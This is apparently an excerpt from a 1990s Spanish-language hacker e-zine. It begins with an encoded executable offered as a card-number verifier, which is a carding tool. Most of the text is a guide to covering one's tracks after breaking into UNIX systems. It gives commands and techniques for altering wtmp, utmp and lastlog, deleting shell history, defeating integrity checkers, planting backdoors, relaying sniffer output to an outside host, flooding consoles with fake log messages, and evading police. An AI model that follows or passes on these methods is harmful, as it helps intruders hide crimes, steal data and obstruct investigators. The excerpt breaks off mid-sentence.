M5]%?!].I9K,SR8D-N``]K_R/\`VP`O\%]4IT`K3[_SR`?6G1"8U5,,TA<D^) M!;AA#Z\'TXO9UOPIBQWA_\I$Y[@$"(O(C,OVPH#YSW41QW4#Z"8`N-_ZX=49 MLQZU31B)71KO'"2.,`@<MS/2V[D"0OPAN2V``(/:`'-RP#SAZXO*B]"BZ8T0 M8)7HN?WRM#_H'_-S6-DSVSO8=""`PU_L&CA#Z_*+TRO0O9%I_;K]L;1`+M$/ M]`0FQ57**PQJL8/QOW(0I_*9\2R&>0@`8JOV"O:%]>ONT/@*O":'.+&W_'(' M844KP9BX936OV_@4:/T7X/P7]!V#^P1V!K0^YOP%A^?1S-'&\W4-WK@-7<55 M"MJJPT;R:&T(?NM7J06"J?A%_#"$NMCH/;'0[-^"=>RP&OG#P/@*LL#X"991 M[,#^:<!<JKP!P/U1M2M6'BG#7JD(!O1=%`7W=.EX$8.[^`H?7EG%FD/^_=?H M4?]U%.AP_[NA#4,\#8<!=?3H9/0*=:-Q0\FTZR77_VC7"O_V/:F%_[`*Z(#_ MX?T&^_6#?=`<&DX#!/_V?ACC#G[L?NOGN__C_F]8,.@"_W*@_LL0Z_51V`HQ M?%7)VOW:#TE^"9;_^DZA%O_B^9;H$)#]UYP>Q'[XXPS:E_[%=@BYDA4;_^BP M_E"I#CP*0T%&B`3_KCM.!G7K*_&(#,K\'UWHS"&&R/V?HB7&B]L?</RL,N0K MR.N8KOZXAYB*1/]!R<CC!^A1O^B>\,+X"FC`#_P[]W,'%_0ERDY/_=_0"SJ! MP6;2_//B_ZJ\W/0\87(&/'IW`BQ*`B!DT?_X0;P`\`````````````!4`P`` M``C'`1<!F@#C`08.'XL.#`"+\4Z)]XS;`QX*`([#_?.D4[@K`%#++HLN"`", MVHGH/0`0=@.X`!`IQ2G"*<..VH[#L0/3X(G!T>!(2(OPB_CSI0GM==C\CL*. MVS'V,?^Z$`"MB<71[4IU!:V)Q;(0<P.DZ_$QR='M2G4%K8G%LA!R(M'M2G4% MK8G%LA#1T='M2G4%K8G%LA#1T4%!K+?_BMCI$P"MB]BQ`]+O@,_@@.0'=`R( MX4%!)HH!JN+ZZZ:L",!T-#P!=`6(P4'KZHG[@^</@<<`(+$$T^N,P`'8+0`" MCL")\X/F#]/KC-@!V([8Z7+_*D9!0BH.'[Y8`5N#PQ")VC'_K`C`=!:T``'' MB\>#YP^Q!-/H`<*.PB8!'>OEK0G`=0B!PO\/CL+KV#T!`'7:B\.+/@0`BS8& M``'&`08"`"T0`([8CL`QV_J.UHOG^R[_+P@0"043"04)"0D%"0D)!0D)"0D) M!0">`@4-"!$2!042!04*!0@2!043!04*!0H%$0P2"RD%!1D%!1D%!1D%!1D% M!1D%!1D%!1@%!1@%!1@%!0H%"@42!04*#`@%#P8,"!(%!1(%!0H%$@4%$@4% ="CX8&A<5'Q,4!0\A`%0!$P`(`0#O!-P`UP<``0`` ` end ...............................Corta entre los puntos......................... [ Este programa verifica los numeros de tarjeta que son proporcionados por el usuario. Se ejecuta CARD.EXE y listo. Estos archivos han sido revisados con ViruScan95 update de Mayo, PcCillin95 update #228, y F-prot 2.26 8-) ] ..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[].. ==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──== []..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[] °°°°°°°°°°°°°°°°°°°°°°°°°°° ° Como cubrir tus Huellas ° ° ▀ ▀ ▀ ▀ ▀ ▀ ▀ ▀ ▀ ▀ ° °°°°°°°°°°°°°°°°°°°°°°°°°°° PRIMERA PARTE: TEORIA I. Introduccion II. Estado Mental III. Lo Basico IV. Avanzado V. Bajo Sospecha VI. Detenido VII. Programas I. Introduccion ---------------------------------------------------------------------- Este texto esta dividido en 2 partes. La primera explica la teoria de borrar las huellas en un sistema y las razones de hacerlo. La segunda te muestra los pasos a tomar en un sistema UNIX y las cosas que debemos evitar. Si eres muy descuidado y flojo para leer todo el articulo (estupido) entonces lee la segunda parte. Si piensas que conocer los exploits mas nuevos es la cosa mas importante para hackear un sistema estas equivocado. ¿Como un exploit te va ayudar cuando te demanden y te quiten tus cuentas y computadoras? La cosa verdaderamente importante para hackear es no ser sorprendido. Es la PRIMERA cosa que un hacker debe dominar, por que en muchas ocasiones, especialmente cuando un objetivo esta constantemente vigilado debido a los multiples ataques que haya sufrido, tu primer hack puede ser el ultimo o si quieres aprender a limpiar tus huellas despues de aprender lo basico sobre unix cambiar tus habitos puede resultarte dificil. Asi que ¡examina estas secciones con cuidado! Hasta un hacker experimentado puede aprender un poco en estos bytes. Asi que esto encontraras aqui: Seccion I - Me estas leyendo (introduccion). Seccion II - Las cosas mentales para convertirte paranoico. 1. Motivacion 2. Por que debes ser paranoico 3. Como convertirte en paranoico 4. Permanecer paranoico Seccion III - Lo basico ANTES de hackear. 1. Prefacio 2. Asegurate 3. Tu propia cuenta 4. Los Registros (LOGS) 5. No dejes huella 6. Cosas que debes evitar Seccion IV - Tecnicas avanzadas 1. Prefacio 2. Previene que te localizen 3. Encuentra y manipula los registros (logs) 4. Checa la configuracion syslog y el archivo 5. Revisa los programas de seguridad instalados 6. Checa los admins 7. Como "corregir" el software de verificacion checksum 8. Trucos de seguridad 9. Miscelanea Seccion V - Que hacer si estas bajo sospecha Seccion VI - Las cosas que debes y no debes hacer cuando seas sorprendido Seccion VII - Programas Lean con cuidado y sean todos ustedes impresionados. II. Mental ---------------------------------------------------------------------- * Motivacion * El aspecto mental es la llave para ser exitoso en todo. Es el poder de motivarte a ti mismo, luchar si duele, ser autodisciplinado, paranoico y realista, calcular los riesgos correctamente y hacer cosas que no te gustan pero son importantes. Si no puedes motivarte a ti mismo para programar herramientas importantes y esperar el momento perfecto para atacar el objetivo, entonces nunca llegaras a ningun lado con tus "hacks". Un hacker exitoso debe cumplir con estos requisitos mentales. Es como hacer fisiculturismo o una dieta - puedes aprenderlo si realmente intentas. HASTA EL MEJOR CONOCIMIENTO NO TE AYUDARA HASTA QUE ESTES REALMENTE PREOCUPADO POR TOMAR PREVENCIONES Y DE HECHO HACERLAS. * Por que debes ser paranoico * Es verdad que ser paranoico normalmente no es algo que hace tu vida mas feliz. De cualquier manera si no estas esperando lo peor, cualquier cosa puede pasarte y perderas el balance. Y recuerda que hackear es arriesgar mucho las cosas. En tu vida normal no debes preocuparte mucho de policias, ladrones y cosas de ese tipo. Pero si estas del otro lado recuerda que tu haces la vida a otras personas dificil, les creas pesadillas y les das trabajo extra - Y quieren detenerte. Aunque sientas que no cometes un crimen - de hecho lo haces. Las cacerias de hackers en Mexico no son populares pero en caso de desatarse alguna todos nos veremos involucrados. Ademas recuerden que aqui en Mexico no existe aquello de "culpable hasta que se demuestre lo contrario." Me ha tocado saber de amigos mios que son sacados de la red simplemente por entablar conversaciones por correo electronico respecto a hackear sin hacerles ningun tipo de pregunta (vil autoritarismo). Una vez que tengas el estigma de un hacker jamas podras quitartelo. Una vez que estes en los records criminales es dificil conseguir trabajo. Ninguna compañia de software o relacionada con sistemas te contratara, tendran miedo de tus aptitudes y te veras a ti mismo forzado a emigrar o tu vida estara perdida. ¡SE PARANOICO! ¡PROTEGETE A TI MISMO! ¡RECUERDA QUE TIENES TODO QUE PERDER! ¡NUNCA TE SIENTAS TONTO DE HACER ALGO EXTRAORDINARIO PARA EVITAR QUE TE LOCALIZEN! ¡QUE NUNCA TE IMPORTE QUE OTROS SE RIAN DE TU PARANOIA! ¡NUNCA SEAS LO BASTANTE FLOJO O CANSADO PARA MODIFICAR LOS REGISTROS! ¡¡¡UN HACKER DEBE HACER SU TRABAJO AL 100%!!! * Como convertirse en paranoico * Si tu lees la parte de arriba y piensas que es verdad, es facil - ya estas paranoico. Pero debe convertirse en parte sustancial de tu vida. Si logras convertirte en un buen hacker siempre piensa en a quien decir algo, y ten presente que tus llamadas y correos electronicos pueden ser monitoreados. Lee y memoriza la seccion pasada. Si lo anterior no te ha ayudado, entonces piensa en lo que te pasaria si te encontraran culpable de "invasion a propiedad privada" y todas esas porquerias legales. ¿Estara tu novia contigo? ¿Quieres ver a tus padres llorar? ¿Quieres verte expulsado de la escuela/universidad/trabajo? ¡No le des NINGUNA oportunidad a esto de que pase! Si todo esto no te motiva para protegerte: ¡DEJA YA DE HACKEAR! Eres un peligro a toda la sociedad de hackers y para tus amigos ! * Permanece Paranoico * Espero hayas entendido la razon para ser paranoico. Asi que permanece paranoico. Un error o un momento de pereza puede ser suficiente para arruinar tu vida o carrera. Siempre recuerda la motivacion para hacerlo. III. LO BASICO ---------------------------------------------------------------------- * Prefacio * Tu debes saber esto y practicarlo antes de empezar con tu primer hack. Existen los absolutamente basicos y sin saberlos estaras en problemas pronto. * ASEGURATE * ¿Que tal si un administrador lee tu correo? ¿Que tal si tus llamadas son grabadas por la policia? ¿Que pasaria si la policia te quita tu computadora con toda la informacion sobre tus hackings en ella? Si no recibes correo sospechoso, no hablas de hack/phreak por el telefono y no tienes archivos sensitivos en tu disco entonces no tienes de que preocuparte. Pero eres un hacker. Cualquier hacker necesita estar en contacto con otros y guardar sus datos en algun lugar. ¡Encripta la informacion que sea sensitiva! Los encriptadores de disco duro son muy importantes y utiles: Hay algunos encriptadores muy buenos disponibles en Internet como los que mencionare: - Si tienes MsDos obten SFS v1.17 o SecureDrive 1.4b - Si tienes Amiga obten EnigmaII v.1.5 - Si usas Unix obten CFS v1.33 Encriptadores de Archivos: Puedes usar cualquiera, pero debe usar uno de los bien conocidos y seguros algoritmos. NUNCA uses un programa de encripcion que pueda ser exportado por que la efectividad de la lengitud de sus llaves es limitada! - Blowfish Advanced 95 (Anti-Tempest, Blowfish32, Idea, Des, etc.) - Triple DES - IDEA - Blowfish (32 rounds) ¡Encripta tu correo electronico! - PGP v2.6.x es el mas usado asi que usalo tu tambien. Encripta tus llamadas telefonicas si quieres discutir cosas importantes. -PGPFONE es muy bueno. -Nautilus v1.5a es uno de los mejores. Encripta tus sesiones de terminal cuando te conectes a un sistema UNIX. Alguien puede estar haciendo sniffing, o monitoreando tu linea. - SSH es el mas seguro. - DES-Login es bastante bueno. Usa fuertes passwords que no puedan ser adivinados y que no sean mencionados en ningun diccionario. Ellos deben ser al hazar pero facil de recordar para ti. Si la llave puede ser mayor de 10 caracteres, usa esa y escoge una sentencia de un libro ligeramente modificada. Encripta los numeros telefonicos de tus amigos dos veces. Y llamales desde telefonos publicos/oficina/etc. solo si no encriptas la llamada. El principiante solo necesita PGP, un encriptor de archivos y un encriptor de disco duro. Si estas realmente hundido en el hacking como nosotros recuerda encriptar TODO. Realiza un respaldo de tu informacion (Zip-Drive, otro disco duro, CD, Tape) encriptada desde luego y guardala donde no pueda encontrarse relacion con equipo de computadoras o contigo. En caso de incendio o que lleguen a tu casa a quitarte tus datos no tendras que empesar de cero. Manten solo las necesarias notas escritas mientras las necesites. No mas tiempo. Guardarlas encriptadas es mucho mas seguro. Quema los papeles cuando ya no los necesites. Tu puedes crear notas con un algoritmo de encripcion que solo tu conozcas, no le digas a nadie de tu algoritmo y no lo uses para textos largos por que puede ser facilmente analizado y quebrado. Los verdaderamente ultra-extremadamente-archi-super paranoicos deben considerar tambien el proyecto TEMPEST. Policias, espias y hackers pueden monitorear todas tus acciones. Una persona bien equipada puede obtener *TODO* lo que quiera : La emanacion de pulsos electronicos pueden ser obtenidos a mas de 100 metros de distancia y muestran la pantalla de tu monitor a cualquier persona, un apuntador laser a traves de tu ventana podria escuchar tus conversaciones y un identificador de señales de alta frecuencia podria marcar todas las teclas que alguien presiona .... Las posibilidades de este ataque son infinitas y aparatos como los jammers (interruptores) de señales electronicas estan en el mercado para prevenir que seas una victima de un ataque de este tipo. * TU PROPIA CUENTA * Ahora vamos hablar de tu cuenta propia. Esta es tu cuenta real que obtuviste en tu escuela/universidad/trabajo/proveedor y esta asociada con tu nombre. Nunca olvides seguir estas reglas cuando uses tu cuenta: Nunca hagas algo ilegal o sospechoso con tu cuenta real. Ni siquiera hagas Telnet a un host para hackear de tu cuenta. Leer las listas de correo sobre seguridad usando tu cuenta esta bien. Pero *TODO* lo que *PAREZCA* que tenga que ver con hacking debera estar encriptado o borrado. Nunca dejes/salves herramientas para hackear en el espacio de tu cuenta. Si puedes usa POP3 para conectarte al servidor de correo y obtener+borrar tu correo (o realizalo de otra manera si tienes experiencia en UNIX) Nunca proporciones tu direccion verdadera de email si tu nombre esta en ella o en el espacio de informacion (GECO) de cada usuario. Has saber tu verdadera direccion solo a personas que puedas confiar y que esten concientes de la seguridad por que si los agarran a ellos tu podrias ser el siguiente. Si vas a usar tu cuenta para intercambiar informacion asegurate de usar PGP ya que los administradores tienden a ser un poco espias (metiches). Nunca uses tu cuenta de una manera que muestre que tienes interes en hacking. El interes en la seguridad es OK pero nada mas. * LOS REGISTROS * En la mayoria de los sistemas existen 3 archivos de registro importantes: WTMP - Todas las entradas/salidas mas tty y host. UTMP - Quien esta en linea en el momento. LASTLOG - De donde vinieron los logins. Existen otros, pero esos seran discutidos en la seccion avanzada. Todos los logins via telnet, ftp, rlogin y en algunos otros sistemas rsh son escritos a estos logs. Es MUY importante que te borres de estos archivos si estas hackeando por que de otra manera: a) pueden ver desde donde hiciste el hacking b) desde que host llegaste c) sabran cuanto tiempo estuviste en linea y calcularan el impacto ¡NUNCA BORRES LOS LOGS! Es la forma mas facil de mostrar a el administrador que un hacker estuvo en la maquina. Obten un buen programa para modificarlos. ZAP -RareGaZz #3- (o ZAP2) es mencionado como el mejor - pero no lo es. Lo unico que hace es sobre escribir la informacion de la ultima persona que entro con ceros. CERT ya saco un simple programa que checa por esos ceros en los logs asi que esa es una forma facil de revelar la presencia de un hacker tambien. De nada sirve hackear R00T si cuando se de cuenta el admin todo tu trabajo no servira de nada! Otra cosa importante de ZAP es que no funciona si no encuentra los archivos con los registros; asi que ¡checa los paths antes de compilar! Obten un programa que CAMBIE la informacion (CLOAK2) o uno bueno que BORRE la entrada (CLEAR). Normalmente uno debe ser r00t para modificar los registros. Pero si no lograste hackear el r00t ¿que puedes hacer? No mucho: Has un rlogin a la computadora en la que estes, para añadir un nuevo y no sospechoso LASTLOG que sera mostrado al administrador cuando entre la proxima vez. Asi el no se pondra nervioso cuando vea "localhost". Muchas distribuciones de UNIX tienen un Bug con el comando Login. Cuando lo ejecutas sobre escribe el campo login en UTMP (¡El que muestra el host de donde vienes!) con tu tty. Los registros por default estan localizados en estos directorios: UTMP : /etc o /var/adm o /usr/adm o /usr/var/adm o /var/log WTMP : /etc o /var/adm o /usr/adm o /usr/var/adm o /var/log LASTLOG : /usr/var/adm o /usr/adm o /var/adm o /var/log * NO DEJES HUELLA * Varios hackers se borran de los logs pero se olvidan de borrar otras cosas como archivos en /tmp y $HOME Shells Algunas shells dejan un archivo de registro(dependiendo de la configuracion) con todos los comandos que el usuario usa. Eso es muy malo para un hacker. La mejor alternativa es empezar un nuevo shell como tu primer comando despues de entrar y checar cada vez por un archivo de historia en tu $HOME. Archivos de historia de comandos: Shell - Archivo sh : .sh_history csh : .history <--- Cincos, Telnor, Microsol, Compunet, orca.etc.. ksh : .sh_history bash: .bash_history zsh : .history En otras palabras: ejecuta "ls -altr" antes de irte! Aqui hay 4 comandos csh que borraran el archivo .history cuando salgas del sistema para no dejar huella. mv .logout save.1 echo rm .history>.logout echo rm .logout>>.logout echo mv save.1 .logout>>.logout * COSAS QUE DEBES EVITAR * No rompas passwords en otras maquinas que no sea la propia, y desde luego hazlo en un disco encriptado. Nota que tambien puedes encriptar una particion de tu disco unicamente. Si tratas de romper passwords en la universidad por ejemplo y el r00t observa el proceso no solo tu cuenta es historia sino tambien el sitio de donde es el archivo con los passwords. Obten el passwd (en estos dias el shadow :-) y crackealo en una segunda computadora o en un proceso background. Tu no necesitas muchas cuentas de un sitio, solo unas pocas. Si ejecutas programas importante como ypx, iss, satan o programas para explotar sistemas renombralos antes de ejecutarlos. Y desde luego no uses parametros en la linea de comandos si el programa soporta modo interactivo como telnet. Escribe "telnet" y abre "open target.host.com" ... que no mostrara el host objetivo en el proceso como parametro. Si hackeas algun sistema no pongas una shell suid en ningun lado! Es mejor tratar de instalar algunas puertas traseras como ping, quota o login y usar fix para corregir el atime y mtime de el archivo si no tienes otra posibilidad. IV. Tecnicas Avanzadas ---------------------------------------------------------------------- * PREFACIO * Una vez que hayas instalado tu primer sniffer y comienzes a hackear por el mundo entero entonces debes saber estas tecnicas. * PREVIENE QUE TE LOCALICEN * En ocasiones tus hacks seran notados. Eso no es ningun problema real si el operador del sistema no esta interesado en perseguir los hackers que jueguen con su sistema, pero si se deciden a encontrarte entonces empiezan los problemas. Este corto capitulo te explicara todas las posibilidades que ELLOS tienen para encontrarte y que posibilidades tienes tu de prevenir eso. * Normalmente *no* sera problema para el administrador identificar a el hacker del sistema si: 1) checan las entradas del registro si el hacker fue peresozo. 2) si el hacker tiene instalado un sniffer checando el output que este produce donde aparecera informacion del hacker. 3) si usan software de auditoria como loginlog 4) usando el comando "netstat" cuando el hacker se encuentre en linea. Debes esperar que un operador de sistemas se entere de tu procedencia, es eso por lo que necesitas un servidor gateway. * Un gateway entre los dos - ¿Que es eso? Es un servidor como KillerBot los mencionoen el numero 3 de la revista "condon" en donde tengas acceso root para alterar los archivos wtmp y lastlog. * El servidor origen del ataque * Desde este servidor haras tu hacking. Telnet (o mejor: remsh/rsh) a una maquina gateway y luego al objetivo. Necesitas acceso root para cambiar los logs. Necesitaras cambiar el servidor desde que hackeas cada 2-4 semanas. * Tu acceso Dial-Up a Internet * Este es el punto mas critico. Una vez que hayan localizado la maquina que usas para accesar a Internet estas frito. Tu *NO* necesitas ser r00t en un host que uses para entrar a Internet. Como a estos te conectas via modem ahi no existen logs que deban ser modificados. Deberas usar una cuenta diferente para entrar a el host cada dia, y tratar de usar aquellas que son mas usadas. No modifiques el sistema de ninguna manera. Necesitas tener por lo menos 2 host para accesar a Internet y cambiarlos cada mes o dos. # Conclusion: Si tu hackeas otras cosas que universidades entonces necesitas hacerlo de esta forma! Aqui esta un esquema para ayudarte ;-) +-------+ ~---------------> +-------------+ +-----------+ |+-----+| > Un metodo para> |Uno de por lo| |Un servidor| || TU || --> > hacer segura > --> |menos 3 hosts| --> |desde donde| |+-----+| > la llamada. > |de proteccion| |hackear. | +-------+ ~---------------> +-------------+ +-----------+ | | v +--------+ +-------------+ | EL | |Un servidor | |OBJETIVO| <-- |hackeado como| | | | gateway | +--------+ +-------------+ * 3. Encuentra y manipula los registros * Es importante que encuentres todos los archivos de registro - hasta los escondidos. Para encontrar todos los tipos de registros existen dos faciles posibilidades. 1) Encuentra todos los archivos abiertos. Como todos los archivos de registro deben ser escritos en algun lado, obten el programa LSOF - LiSt Open Files - para verlos ... checalos ... y si es necesario corrigelos. 2) Busca todos los archivos modificados despues de que entraste. Despues de que entres a un sistema usa el comando "touch /tmp/check" despues trabaja. Luego usa el comando "find / -newer /tmp/check -print" y revisa si alguno de esos archivos son de auditoria. observa>revisa>corrige. Nota que no todos los sistemas y versiones soportan la opcion -newer Tu tambien puedes hacer un "find / -ctime 0 -print" o "find / -cmin 0 -print" para encontrar los registros. Revisa todos los registros que encuentres. Normalmente los registros estaran en /usr/adm, /var/adm o /var/log. Si cosas se registran a @loghost entonces estas en problemas. Tu necesitas hackear la maquina loghost para modificar los logs. Para manipular los logs puedes hacer "grep -v", o un conteo de lineas con wc, y luego cortar las 10 ultimas con "head -LineNumbersMinus10" o usar un editor etc. Si los archivos de registro/auditoria no son archivos de texto sino de datos identifica el software que escribe los registros. Despues consigue el codigo fuente. Despues encuentra el encabezado que defina la estructura del archivo. Obten zap, clear, cloak etc. y re-programa los codigos con los encabezados del archivo a usar con este tipo especial de archivos de registro (y despues pasalo a la comunidad del hacking). Si un programa de auditoria esta instalado necesitaras el acct-cleaner de zhart, funciona muy bien! Un pequeño truco para modificar wtmp es necesario si no puedes compilar ningun codigo fuente, perl, etc. Funciona en sistemas Sun pero no en Linux: Has uuencode de wtmp. Ejecuta vi, ve al final del archivo y borra las ultimas 4 lineas que comienzen con "M" ... despues salvalo y sal., uudecode y las ultimas 5 entradas al wtmp estaran borradas ;-) Si el sistema usa wtmpx y utmpx entonces estas en problemas ... Hasta ahora no conozco ningun programa que pueda modificarlos. * 4. Checa la configuracion syslog y el archivo * La mayoria de los programas usan syslog para registrar lo que quieren. Es importante revisar la configuracion donde syslog imprimira los mensajes. El archivo de configuracion es /etc/syslog.conf - la descripcion de cada entrada en ese archivo NO seran explicadas en este texto. Lee algun otro archivo que trate ese tema en especial ;-). Los tipos de archivos y entradas importantes son kern.*, auth.* y authpriv.* Fijate donde se escriben esos archivos: los archivos pueden ser modificados. Si han sido mandados a otro servidor deberas hackear ese tambien. Si los mensajes son enviados a un usuario, tty y/o consola puedes hacer un pequeño truco para generar falsos mensajes de registro como ""echo 17:04 12-05-85 kernel sendmail[243]: can't resolve bla.bla.com > /dev/console" o cualquier consola que quieras inundar para que el mensaje que desees esconder simplemente se esconda entre los demas. Los archivos de registro son *MUY* importantes! Revisalos. * Revisa los programas de seguridad instalados * En los sitios conscientes de seguridad, existen algunos chequeadores de seguridad que son ejecutados por cron. El directorio normal para los crontabs son /var/spool/cron/contabs Revisa todas las entradas, especialmente las de el archivo "root" y examina los archivos que ejecuta. Para una investigacion rapida de los crontabs del root escribe "crontab -l root". Algunas de estas herramientas de seguridad son instaladas por las cuentas administrativas. Algunas de ellas (pequeñas utilidades para revisar wtmp, y si un sniffer esta instalado) estan en ~/bin. Lee abajo para identificar estos admins y revisar sus directorios. El software de chequeo interno puede ser tiger, cops, spi, tripwire, l5, binaudit, hobgoblin, s3 etc. Debes examinar lo que reportan y si ellos reportan algo eso seria un signo de alerta de tus hacks. Si ese software reporta acciones sospechosas puedes: - Actualizar los archivos de datos del programa (modo aprendizaje) para que no reporte ese tipo de ataques. - Reprogramar/modificar el software para que no reporten las acciones sospechosas. * 6. Checa los admins * Es importante para ti que revises las medidas que los sysops toman si es que las toman. - asi que primero necesitas saber las cuentas que normalmente utilizan. Puedes revisar el archivo .forward de root y revisar la entrada alias del root. Tambien revisa el archivo passwd por "admin" para que revele a los administradores. Ahora debes saber los 1-6 administradores en las maquinas que esten. Cambia los directorios (usa chid.c, changeid.c o algun script similar para convertirte en ese usuario si el root no tiene derechos a leer cada archivo) y revisa sus archivos .history/.sh_history/.bash_history para ver que comandos usan. Checa sus archivos .profile/.login/.bash_profile para ver que alias tienen en sus chequeos de seguridad. Examina sus directorios ~/bin! La mayoria del tiempo los programas de seguridad son puestos en ese directorio! Y desde luego echa un vistazo a cada directorio que ellos tengan con el comando "ls-alR ~/". Si encuentras programas de seguridad, lee 5.) para las posibilidades de sobrepasar esas protecciones. * 7. Como "corregir" el software de verificacion checksum * Algunos administradores le temen a los hackers e instalan software para detectar cambios en sus valiosos binarios. Si un binario es modificado, la proxima vez que el administrador haga un chequeo sera detectado. Asi que como necesitas saber ¿como puedes a)encontrar que chequeadores de binarios estan instalados y b) como modificarlos para que puedas plantar un caballo de troya? Nota que existen muchos chequeadores de archivos binarios y que es muy facil escribir alguno - toma 15 minutos - y puede ser realizado con un pequeño script. Asi que es dificil encontrar este tipo de software si es que esta instalado. Estos son algunos de los programas mas usados: SOFTWARE : PATH STANDARD : NOMBRE DE LOS ARCHIVOS BINARIOS tripwire : /usr/adm/tcheck, /usr/local/adm/tcheck : databases, tripwire binaudit : /usr/local/adm/audit : auditscan hobgoblin : ~user/bin : hobgoblin raudit : ~user/bin : raudit.pl l5 : directorio para compilar : l5 Como puedes ver hay demasiadas posibilidades! El software o base de datos podria estar en un disco no montado en el sistema o en una particion de otro host. O la base de datos con los checksums podria estar en un medio protegido fisicamente. En el caso de que encuentres un sistema de seguridad de este tipo lo mejor es no modificar los archivos binarios. * 8. Trucos de seguridad * Esto es una cosa rara de hacer y solo es necesario revisar para hacer un buen trabajo. Algunos usuarios, llamados administradores y hackers, usualmente no quieren que sus cuentas sean usadas por otras personas. Es por eso que ponen seguridad en sus archivos de inicio. Asi que revisa todos los archivos de puntos (.profile, .cshrc, .login, .logout etc.) y que comandos ejecutan, que registros tienen y cual es el path de busqueda establecido. Si por ejemplo $HOME/bin viene antes de /bin en el path de busqueda deberas revisar los contenidos de ese directorio ... quizas exista un programa llamado "ls" o "w" instalado que registra la ejecucion antes de ejecutar el verdadero programa. Tambien revisa automaticamente los archivos wtmp y lastlog para ver si ha sido ejecutado zap, si han sido manipulados los archivos .rhosts y .Xauthority, sniffers activos, etc. ¡Nunca te metas con cuentas que un 'Mago' de unix este usando! * 9. Miscelanea * Estas son algunas cosas en las que debes poner atencion. Los clientes Telnet viejos exportan la variable USER. Un administrador que conozca eso y modifique el telnetd puede obtener todos los nombres de usuario e identificar desde que cuenta estas hackeando cuanto se de cuenta de tu presencia. Los nuevos clientes han sido arreglados - pero el administrador inteligente tiene otras formas de localizarte: las variables UID, MAIL y HOME son exportadas y hacen la identificacion de la cuenta usada por el hacker facilmente. Antes de hacer un Telnet, cambia las variables USER, UID, MAIL y HOME, quizas hasta la variable PWD si estas en el directorio Home. En los sistemas HP-UX <v10 puedes crear directorios escondidos. No estoy hablando acerca de los archivos de punto . o similares sino de un atributo. HP introdujo esta opcion en la version 9 pero fue removida en la 10 (debido a que era usada solo por hackers ;-). Si haces un "chmod +H directorio" es invisible a el comando "ls -al". Para ver los directorios escondidos necesitas usar el switch -H ejemplo: "ls -alH" Cuando necesites modificar la fecha de un archivo recuerda que usando el comando "touch" puedes cambiar el atime y mtime. Si instalas un sniffer y es un sistema importante, entonces necesitas asegurarte de ofuscar la salida (output) del sniffer (con un algoritmo de encripcion o dejar que el sniffer envie toda la informacion capturada por via icmp o udp a un host externo bajo tu control). ¿Por que? Si el administrador del sistema se entera del sniffer (cpm y otro software checando por sniffers) no podran identificar en el archivo de registro que informacion fue obtenida, asi que no podra avisar a otros hosts sobre tu presencia. V. BAJO SOSPECHA ---------------------------------------------------------------------- Una vez que estes bajo sospecha (policia o algun administrador) tu deberas tomar acciones especiales para que no tengan evidencia en contra tuya. NOTA: Si los administradores de algun sistema piensan que eres un hacker, ERES CULPABLE HASTA DEMOSTRAR TU INOCENCIA Las leyes no significan nada a los administradores (a veces pienso que la diferencia entre un hacker y un administrador es que solo la computadora pertenece a ellos). Cuando ellos piensen que eres un hackers, eres culpable si no tienes un abogado que hable por ti. Ellos tendran que monitorear tu e-mail, archivos y si son lo suficientemente buenos, las teclas que presiones tambien. Cuando la policia esta involucrada, tu linea telefonica puede ser monitoreada tambien y una emboscada puede venir pronto. Si te das cuenta o temes que estes bajo sospecha entonces manten un perfil bajo! No accion ofensiva debe ser tomada que apunte al hacking. La mejor cosa es esperar por lo menos 1 o 2 meses sin hacer nada. Avisa a tus amigos que no envien correo, si el correo que recibes esta encriptado con PGP solo alertaras a los administradores. Recuerda encriptar toda tu informacion sensitiva y remover todos los papeles con informacion sobre cuentas, numeros telefonicos, etc. Esas son las cosas mas importantes que los administradores y policias buscaran cuando entren a tu casa. VI. DETENIDO ---------------------------------------------------------------------- Ahora hablaremos de las cosas que debes y no debes hacer cuando la policia te visite. Hay dos cosas *muy* importantes que debes hacer: 1) ¡ OBTEN UN ABOGADO INMEDIATAMENTE ! El abogado debe llamar al juez y apelar a la orden de cateo. Esto no ayuda mucho pero puede interrumpir su trabajo. El abogado debe decirte todo lo que los policias tienen derecho a hacer y que no. El abogado debe escribir una carta a el juez solicitando las computadoras que te hayan sido confiscadas de regreso tan rapido como sea posible por tu necesidad urgente de hacer negocios, etc. 2) ¡ NUNCA HABLES CON LOS POLICIAS ! Los policias no pueden prometerte nada. Si te dicen que saldras del problema si hablas no confies! Solo el juez tiene el poder de hacer esto. Los policias solo quieren que les digas informacion que pueda ser usada en contra tuya. Siempre deberas negarte a ofrecer evidencia (passwords,etc) y diles que hablen contigo a traves de tu abogado. Entonces debes hacer un plan con tu abogado para salir del problema sin daño o reducirlo. ¡POR FAVOR! ten en cuenta esto: no traiciones a tus amigos. No les digas ningun secreto. Si lo haces sera un boomerang: tus ex-amigos se enojaran y se vengaran, y aquellos que seran atrapados por tu culpa tambien hablaran ... y daran a la policia mas informacion acerca de *tus* crimenes. Pregunta si en tu pais pueden forzarte a abrir tu caja fuerte, si este es el caso entonces debes negar tener archivos encriptados. VII. PROGRAMAS ---------------------------------------------------------------------- Esta es una pequeña lista de los programas que deberas obtener y usar. No preguntes donde puedes conseguirlos, necesitas encontrarlos. Primero un pequeño Glosario: Cambiar - Cambiar campos del archivo de registro por lo que quieras. Borrar - Elimina las entradas que desees. Editar - Un editor para el archivo de registro. Sobre-Escribir - Sobre-escribe las entradas con valores de zero bytes. Modificadores de Registro ~~~~~~~~~~~~~~~~~~~~~~~~~ ah-1_0b.tar Cambia las entradas de los programas de auditoria. clear.c Borra las entradas en utmp, wtmp, lastlog y wtmpx cloak2.c Cambia las entradas en utmp, wtmp y lastlog invisible.c Sobre-escribe utmp, wtmp y lastlog con valores predefinidos, asi que es mejor que zap. marryv11.c Edita utmp, wtmp, lastlog e informacion de auditoria -Mejor! wzap.c Borra las entradas en wtmp wtmped.c Borra las entradas en wtmp zap.c Sobre-escribe utmp, wtmp, lastlog - Puede ser detectado! Por: CrackSmoker -Lider actual del grupo RdK- Para: RareGaZz ..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[].. ==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──== []..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[] POISON JAVA ~~~~~~~~~~~ Sun Microsystems' le ha 